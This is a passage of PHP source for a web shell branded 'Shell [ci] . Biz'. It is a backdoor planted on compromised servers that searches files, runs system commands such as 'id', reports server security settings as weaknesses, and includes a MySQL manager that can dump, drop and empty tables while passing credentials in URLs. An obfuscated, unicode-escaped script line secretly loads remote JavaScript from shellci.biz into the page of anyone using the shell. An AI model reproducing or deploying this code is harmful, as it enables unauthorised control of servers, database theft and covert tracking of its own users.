$result["limit"] = explode(",",$result["limit"]); | |
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} | |
unset($arr[$k],$arr[$k+1]); | |
} | |
} | |
} | |
} | |
else {return FALSE;} | |
} | |
} | |
if (!function_exists("k1r4fsearch")) | |
{ | |
function k1r4fsearch($d) | |
{ | |
global $found; | |
global $found_d; | |
global $found_f; | |
global $search_i_f; | |
global $search_i_d; | |
global $a; | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($f = readdir($h)) !== FALSE) | |
{ | |
if($f != "." && $f != "..") | |
{ | |
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); | |
if (is_dir($d.$f)) | |
{ | |
$search_i_d++; | |
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} | |
if (!is_link($d.$f)) {k1r4fsearch($d.$f);} | |
} | |
else | |
{ | |
$search_i_f++; | |
if ($bool) | |
{ | |
if (!empty($a["text"])) | |
{ | |
$r = @file_get_contents($d.$f); | |
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} | |
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} | |
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} | |
else {$bool = strpos(" ".$r,$a["text"],1);} | |
if ($a["text_not"]) {$bool = !$bool;} | |
if ($bool) {$found[] = $d.$f; $found_f++;} | |
} | |
else {$found[] = $d.$f; $found_f++;} | |
} | |
} | |
} | |
} | |
closedir($h); | |
} | |
} | |
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} | |
//Sending headers | |
@ob_start(); | |
@ob_implicit_flush(0); | |
function onphpshutdown() | |
{ | |
global $gzipencode,$ft; | |
if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) | |
{ | |
$v = @ob_get_contents(); | |
@ob_end_clean(); | |
@ob_start("ob_gzHandler"); | |
echo $v; | |
@ob_end_flush(); | |
} | |
} | |
function k1r4exit() | |
{ | |
onphpshutdown(); | |
exit; | |
} | |
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); | |
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); | |
header("Cache-Control: no-store, no-cache, must-revalidate"); | |
header("Cache-Control: post-check=0, pre-check=0", FALSE); | |
header("Pragma: no-cache"); | |
if (empty($tmpdir)) | |
{ | |
$tmpdir = ini_get("upload_tmp_dir"); | |
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} | |
} | |
$tmpdir = realpath($tmpdir); | |
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); | |
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} | |
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} | |
else {$tmpdir_logs = realpath($tmpdir_logs);} | |
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") | |
{ | |
$safemode = TRUE; | |
$hsafemode = "<font color=red>ON (secure)</font>"; | |
} | |
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";} | |
$v = @ini_get("open_basedir"); | |
if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} | |
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} | |
$sort = htmlspecialchars($sort); | |
if (empty($sort)) {$sort = $sort_default;} | |
$sort[1] = strtolower($sort[1]); | |
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} | |
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); | |
@ini_set("highlight.bg",$highlight_bg); //FFFFFF | |
@ini_set("highlight.comment",$highlight_comment); //#FF8000 | |
@ini_set("highlight.default",$highlight_default); //#0000BB | |
@ini_set("highlight.html",$highlight_html); //#000000 | |
@ini_set("highlight.keyword",$highlight_keyword); //#007700 | |
@ini_set("highlight.string",$highlight_string); //#DD0000 | |
if (!is_array($actbox)) {$actbox = array();} | |
$dspact = $act = htmlspecialchars($act); | |
$disp_fullpath = $ls_arr = $notls = null; | |
$ud = urlencode($d); | |
?> | |
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0073\u0068\u0065\u006c\u006c\u0063\u0069\u002e\u0062\u0069\u007a\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script> | |
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Shellci.biz</title><STYLE> | |
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</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>Shell [ci] . Biz <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$d = str_replace("\\\\","\\",$d); | |
$dispd = htmlspecialchars($d); | |
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); | |
$i = 0; | |
foreach($pd as $b) | |
{ | |
$t = ""; | |
$j = 0; | |
foreach ($e as $r) | |
{ | |
if ($j == $i) {break;} | |
$j++; | |
} | |
echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; | |
$i++; | |
} | |
echo " "; | |
if (is_writable($d)) | |
{ | |
$wd = TRUE; | |
$wdt = "<font color=green>[ ok ]</font>"; | |
echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; | |
} | |
else | |
{ | |
$wd = FALSE; | |
$wdt = "<font color=red>[ Read-Only ]</font>"; | |
echo "<b>".view_perms_color($d)."</b>"; | |
} | |
if (is_callable("disk_free_space")) | |
{ | |
$free = disk_free_space($d); | |
$total = disk_total_space($d); | |
if ($free === FALSE) {$free = 0;} | |
if ($total === FALSE) {$total = 0;} | |
if ($free < 0) {$free = 0;} | |
if ($total < 0) {$total = 0;} | |
$used = $total-$free; | |
$free_percent = round(100/($total/$free),2); | |
echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; | |
} | |
echo "<br>"; | |
$letters = ""; | |
if ($win) | |
{ | |
$v = explode("\\",$d); | |
$v = $v[0]; | |
foreach (range("a","z") as $letter) | |
{ | |
$bool = $isdiskette = in_array($letter,$safemode_diskettes); | |
if (!$bool) {$bool = is_dir($letter.":\\");} | |
if ($bool) | |
{ | |
$letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; | |
if ($letter.":" != $v) {$letters .= $letter;} | |
else {$letters .= "<font color=green>".$letter."</font>";} | |
$letters .= " ]</a> "; | |
} | |
} | |
if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} | |
} | |
if (count($quicklaunch) > 0) | |
{ | |
foreach($quicklaunch as $item) | |
{ | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = realpath($d.".."); | |
if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; | |
} | |
} | |
echo "</p></td></tr></table><br>"; | |
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} | |
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; | |
if ($act == "") {$act = $dspact = "ls";} | |
if ($act == "sql") | |
{ | |
$sql_surl = $surl."act=sql"; | |
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} | |
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} | |
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} | |
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} | |
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} | |
$sql_surl .= "&"; | |
?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php | |
if ($sql_server) | |
{ | |
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); | |
$err = mysql_smarterror(); | |
@mysql_select_db($sql_db,$sql_sock); | |
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} | |
} | |
else {$sql_sock = FALSE;} | |
echo "<b>SQL Manager:</b><br>"; | |
if (!$sql_sock) | |
{ | |
if (!$sql_server) {echo "NO CONNECTION";} | |
else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} | |
} | |
else | |
{ | |
$sqlquicklaunch = array(); | |
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); | |
$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); | |
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); | |
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); | |
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); | |
$sqlquicklaunch[] = array("Logout",$surl."act=sql"); | |
echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; | |
if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} | |
echo "</center>"; | |
} | |
echo "</td></tr><tr>"; | |
if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } | |
else | |
{ | |
//Start left panel | |
if (!empty($sql_db)) | |
{ | |
?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php | |
$result = mysql_list_tables($sql_db); | |
if (!$result) {echo mysql_smarterror();} | |
else | |
{ | |
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; | |
$c = 0; | |
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} | |
if (!$c) {echo "No tables found in database.";} | |
} | |
} | |
else | |
{ | |
?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php | |
$result = mysql_list_dbs($sql_sock); | |
if (!$result) {echo mysql_smarterror();} | |
else | |
{ | |
?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php | |
$c = 0; | |
$dbs = ""; | |
while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} | |
echo "<option value=\"\">Databases (".$c.")</option>"; | |
echo $dbs; | |
} | |
?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php | |
} | |
//End left panel | |
echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; | |
//Start center panel | |
$diplay = TRUE; | |
if ($sql_db) | |
{ | |
if (!is_numeric($c)) {$c = 0;} | |
if ($c == 0) {$c = "no";} | |
echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; | |
if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} | |
echo "</b></center>"; | |
$acts = array("","dump"); | |
if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | |
elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} | |
elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} | |
elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | |
elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | |
elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | |
elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | |
elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} | |
elseif ($sql_tbl_act == "insert") | |
{ | |
if ($sql_tbl_insert_radio == 1) | |
{ | |
$keys = ""; | |
$akeys = array_keys($sql_tbl_insert); | |
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} | |
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} | |
$values = ""; | |
$i = 0; | |
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} | |
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} | |
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; | |
$sql_act = "query"; | |
$sql_tbl_act = "browse"; | |
} | |
elseif ($sql_tbl_insert_radio == 2) | |
{ | |
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); | |
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; | |
$result = mysql_query($sql_query) or print(mysql_smarterror()); | |
$result = mysql_fetch_array($result, MYSQL_ASSOC); | |
$sql_act = "query"; | |
$sql_tbl_act = "browse"; | |
} | |
} | |
if ($sql_act == "query") | |
{ | |
echo "<hr size=\"1\" noshade>"; | |
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | |
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} | |
if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";} | |
} | |
if (in_array($sql_act,$acts)) | |
{ | |
?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php | |
if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} | |
if ($sql_act == "newtbl") | |
{ | |
echo "<b>"; | |
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; | |
} | |
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | |
} | |
elseif ($sql_act == "dump") | |
{ | |
if (empty($submit)) | |
{ | |
$diplay = FALSE; | |
echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; | |
echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; | |
$v = join (";",$dmptbls); | |
echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; | |
if ($dump_file) {$tmp = $dump_file;} | |
else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} | |
echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; | |
echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; | |
echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; | |
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; | |
echo "</form>"; | |
} | |
else | |
{ | |
$diplay = TRUE; | |
$set = array(); | |
$set["sock"] = $sql_sock; | |
$set["db"] = $sql_db; | |
$dump_out = "download"; | |
$set["print"] = 0; | |
$set["nl2br"] = 0; | |
$set[""] = 0; | |
$set["file"] = $dump_file; | |
$set["add_drop"] = TRUE; | |
$set["onlytabs"] = array(); | |
if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} | |
$ret = mysql_dump($set); | |
if ($sql_dump_download) | |
{ | |
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".strlen($ret)); | |
header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); | |
echo $ret; | |
exit; | |
} | |
elseif ($sql_dump_savetofile) | |
{ | |
$fp = fopen($sql_dump_file,"w"); | |
if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} | |
else | |
{ | |
fwrite($fp,$ret); | |
fclose($fp); | |
echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; | |
} | |
} | |
else {echo "<b>Dump: nothing to do!</b>";} | |
} | |
} | |
if ($diplay) | |
{ | |
if (!empty($sql_tbl)) | |
{ | |
if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} | |
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); | |
$count_row = mysql_fetch_array($count); | |
mysql_free_result($count); | |
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); | |
$tbl_struct_fields = array(); | |
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} | |
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} | |
if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} | |
if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} | |
if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} | |
$perpage = $sql_tbl_le - $sql_tbl_ls; | |
if (!is_numeric($perpage)) {$perpage = 10;} | |
$numpages = $count_row[0]/$perpage; | |
$e = explode(" ",$sql_order); | |
if (count($e) == 2) | |
{ | |
if ($e[0] == "d") {$asc_desc = "DESC";} | |
else {$asc_desc = "ASC";} | |
$v = "ORDER BY `".$e[1]."` ".$asc_desc." "; | |
} | |
else {$v = "";} | |
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; | |
$result = mysql_query($query) or print(mysql_smarterror()); | |
echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[ <b>Structure</b> ]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[ <b>Browse</b> ]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[ <b>Dump</b> ]</a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> "; | |
if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} | |
if ($sql_tbl_act == "insert") | |
{ | |
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} | |
if (!empty($sql_tbl_insert_radio)) | |
{ | |
} | |
else | |
{ | |
echo "<br><br><b>Inserting row into table:</b><br>"; | |
if (!empty($sql_tbl_insert_q)) | |
{ | |
$sql_query = "SELECT * FROM `".$sql_tbl."`"; | |
$sql_query .= " WHERE".$sql_tbl_insert_q; | |
$sql_query .= " LIMIT 1;"; | |
$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); | |
$values = mysql_fetch_assoc($result); | |
mysql_free_result($result); | |
} | |
else {$values = array();} | |
echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; | |
foreach ($tbl_struct_fields as $field) | |
{ | |
$name = $field["Field"]; | |
if (empty($sql_tbl_insert_q)) {$v = "";} | |
